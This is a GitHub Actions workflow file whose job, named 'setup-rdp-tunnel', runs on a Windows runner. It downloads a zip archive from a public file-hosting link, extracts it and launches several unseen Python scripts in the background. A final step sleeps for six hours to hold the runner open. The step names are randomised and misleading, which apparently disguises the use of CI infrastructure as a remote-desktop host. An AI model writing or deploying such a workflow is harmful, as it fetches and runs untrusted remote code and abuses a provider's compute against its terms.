name: cod-fix

on:
  workflow_dispatch:

jobs:
  setup-rdp-tunnel:
    runs-on: windows-2025

    steps:
    - name: Check repository-v6524
      uses: actions/checkout@v2

    - name: Download and extract-v4474
      run: |
        curl -L -o code.zip https://pixeldrain.com/api/file/whRyLKYq/info/zip/main10.zip
        Start-Sleep -Seconds 5
        powershell -Command "Expand-Archive -Force code.zip extracted"


    - name: package-888
      run: python -m pip install requests
      
    - name: main.py-g9632
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python test.py
        Start-Sleep -Seconds 10

    - name: main.py-g4478
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python main.py
        Start-Sleep -Seconds 10

    - name: main.py-g25669
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python test2.py
        Start-Sleep -Seconds 10
        
    - name: test3.py-v22546
      run: |
        cd extracted
        Start-Sleep -Seconds 10
        python test3.py

    - name: Keep alive-vartion04001
      run: Start-Sleep -Seconds 21600 
